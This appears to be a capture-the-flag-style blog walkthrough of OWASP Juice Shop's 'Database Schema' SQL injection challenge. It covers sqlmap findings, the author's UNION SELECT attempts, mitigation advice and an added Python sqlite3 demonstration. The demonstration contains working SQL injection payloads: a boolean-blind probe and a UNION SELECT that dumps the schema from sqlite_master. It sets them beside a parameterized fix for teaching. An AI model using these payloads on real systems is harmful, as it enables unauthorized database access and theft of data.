Challenge:
Name: Database Schema
Description: Exfiltrate the entire DB schema definition via SQL injection.
Difficulty: 3 star
Category: Injection
Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html
Tools used:
Burp, FoxyProxy, sqlmap
Resources used:
SQL Injection Payload Wordlist
OWASP SQL Injection Documentation
OWASP SQL Injection Bypassing WAF
Methodology:
SQL injection is still a topic I need to gain a better grasp on. While I’ve taken courses where I’ve planned, diagrammed, and built databases, studied relational algebra, and written SQL queries, I’m more than a little rusty at it. That fact, coupled with a desire to become more comfortable with the tools available to me in Kali Linux, led me to use sqlmap for my first attempt at solving this problem. From previous challenges (DOM XSS) I knew that there was no input sanitization on the “Search” field, so I decided to start there.
As sqlmap has differing levels of intensity (how noisy and potentially harmful it is to the target system), and because I’m running the application on Docker, I decided there was no real point in being quiet. As such I set up the program to be exceedingly thorough in its search of that input field.

![sqlmap output: parameter q (GET) identified as injectable after 176 requests, type boolean-based blind (AND boolean-based blind, WHERE or HAVING clause), payload q;') AND 3971=3971 AND ('CSPd' LIKE 'CSPd; back-end DBMS fingerprinted and confirmed as SQLite; warning that on SQLite it is not possible to enumerate databases (use only '--tables'); HTTP 500 Internal Server Error detected 140 times during the run](https://curiositykillscolby.files.wordpress.com/2020/11/image-58.jpeg?w=641)
What do you know? It’s vulnerable! OK, so now to extract the database schema and finish off this challenge.

![sqlmap output: stored session resumed for parameter q (GET), boolean-based blind, back-end DBMS SQLite; enumerating the database management system schema for 'SQLite_masterdb', 21 tables retrieved: Addresses, Baskets, BasketItems, Captchas, Cards, Challenges, Complaints, Deliveries, Feedbacks, ImageCaptchas, Memories, privacyRequests, Products, purchaseQuantities, Quantities, Recycles, SecurityAnswers, SecurityQuestions, sqlite_sequence, Users, Wallets; warning that sqlmap is running in single-thread mode and suggesting '--threads' for faster data retrieval](https://curiositykillscolby.files.wordpress.com/2020/11/image-60.jpeg?w=636)
But there was no completion alert. It wasn’t difficult to figure out that OWASP hadn’t set up this challenge simply to test my sqlmap skills, so I began reading up on how to craft a UNION SELECT attack through the address bar. Thanks to the sqlmap results, I knew there were 21 different tables to enumerate, but beyond that I was a little lost.

OK, a lot lost. After deciphering error after error, I narrowed down the number of tables I actually needed to enumerate to nine rather than 21. Knowing I was close, however, didn’t make this easier. Ultimately I gave in and read the solution. Had I replaced ‘1’ with ‘sql’ in my final query, it would have worked. Horseshoes and hand grenades, I suppose.

Because I had already used sqlmap and knew it worked, once I had completed this challenge I went back and dumped the entire database to a text file, formatted that file for easy reading, and stored it for later use. The more I know about the system in general, and database contents specifically, the more easily I’ll be able to solve future challenges.

Prevention and mitigation strategies:
Use parameterized queries (prepared statements) so that user input reaches the database as a bound value and can never become part of the SQL text. Sanitizing or validating input fields is a worthwhile second layer, but on its own it is not a reliable defence against SQL injection.
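To make concrete the three things this challenge turns on (the boolean-based blind probe sqlmap reported, the UNION SELECT that reads the schema out of sqlite_master, and why "1" versus "sql" is the difference between a near miss and a solve) and to show the fix beside the bug, here is an added example written for this walkthrough. It is not the post's own code and not Juice Shop's; it uses Python's built-in sqlite3 module against a constructed in-memory database. The table definitions, sample rows, the three-column result shape of the search query, and the payload strings are assumptions made for illustration: against the real application the UNION must match the real query's column count, so the payloads would need more placeholders.

```python
import sqlite3

# Constructed stand-in for the Juice Shop product search (assumption: three
# result columns and a trimmed-down schema; the real application differs).
SCHEMA = [
    "CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT, description TEXT, deletedAt TEXT)",
    "CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)",
    "CREATE TABLE SecurityAnswers (id INTEGER PRIMARY KEY, UserId INTEGER, answer TEXT)",
]


def make_db():
    """Build an in-memory SQLite database with a few constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    for stmt in SCHEMA:
        conn.execute(stmt)
    conn.executemany(
        "INSERT INTO Products (name, description, deletedAt) VALUES (?, ?, NULL)",
        [("Apple Juice", "Juice made from apples"), ("Banana Juice", "Juice made from bananas")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, criteria):
    """The search term is spliced into the SQL text: the injectable pattern."""
    sql = (
        "SELECT id, name, description FROM Products "
        f"WHERE ((name LIKE '%{criteria}%' OR description LIKE '%{criteria}%') "
        "AND deletedAt IS NULL) ORDER BY name"
    )
    return conn.execute(sql).fetchall()


def search_parameterized(conn, criteria):
    """Same query with bound parameters: the term can never become SQL."""
    like = f"%{criteria}%"
    return conn.execute(
        "SELECT id, name, description FROM Products "
        "WHERE ((name LIKE ? OR description LIKE ?) AND deletedAt IS NULL) ORDER BY name",
        (like, like),
    ).fetchall()


# Boolean-based blind probes of the shape sqlmap reported: close the LIKE
# string and one parenthesis, then append a condition that is either true or
# false. If the two responses differ, the parameter is injectable.
BLIND_TRUE = "') AND 3971=3971 AND ('CSPd' LIKE 'CSPd"
BLIND_FALSE = "') AND 3971=3972 AND ('CSPd' LIKE 'CSPd"


def boolean_blind_injectable(conn, search):
    """True when a true and a false condition produce different result sets."""
    try:
        return len(search(conn, BLIND_TRUE)) != len(search(conn, BLIND_FALSE))
    except sqlite3.Error:
        return False


# The UNION payload that dumps the schema: close the LIKE string and both
# parentheses, append a SELECT with the same number of columns that reads the
# sql column of sqlite_master, and comment out the rest of the original query.
PAYLOAD_SCHEMA = "qwert')) UNION SELECT sql, '2', '3' FROM sqlite_master--"
# The near miss: syntactically identical, but it selects the literal '1'
# instead of the sql column, so the query succeeds and leaks nothing.
PAYLOAD_NEAR_MISS = "qwert')) UNION SELECT '1', '2', '3' FROM sqlite_master--"


def dump_schema(conn, payload):
    """Return the CREATE statements that leak through the vulnerable search."""
    rows = search_vulnerable(conn, payload)
    return sorted(r[0] for r in rows if isinstance(r[0], str) and r[0].startswith("CREATE"))


if __name__ == "__main__":
    db = make_db()
    print("blind probe differs (vulnerable):   ", boolean_blind_injectable(db, search_vulnerable))
    print("blind probe differs (parameterized):", boolean_blind_injectable(db, search_parameterized))
    print("schema leaked with '1' payload:", dump_schema(db, PAYLOAD_NEAR_MISS))
    print("schema leaked with sql payload:")
    for stmt in dump_schema(db, PAYLOAD_SCHEMA):
        print("  ", stmt)
    print("parameterized search given the payload:", search_parameterized(db, PAYLOAD_SCHEMA))
```

Running it shows the vulnerable search answering the true and false probes differently (the signal sqlmap keyed on), the "1" payload returning rows but no schema, the "sql" payload returning every CREATE statement in sqlite_master, and the parameterized version returning nothing for either payload because the whole string is just a search term.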
Lessons Learned and Things Worth Mentioning:
- When I started writing these walkthroughs I pointed out that I would be using this series to learn, not to demonstrate mastery. It’s not my favorite thing in the world to admit defeat, but sometimes the best way to learn something is to see it done properly and try to understand why it works the way it does. Beating your head against the wall is only so effective.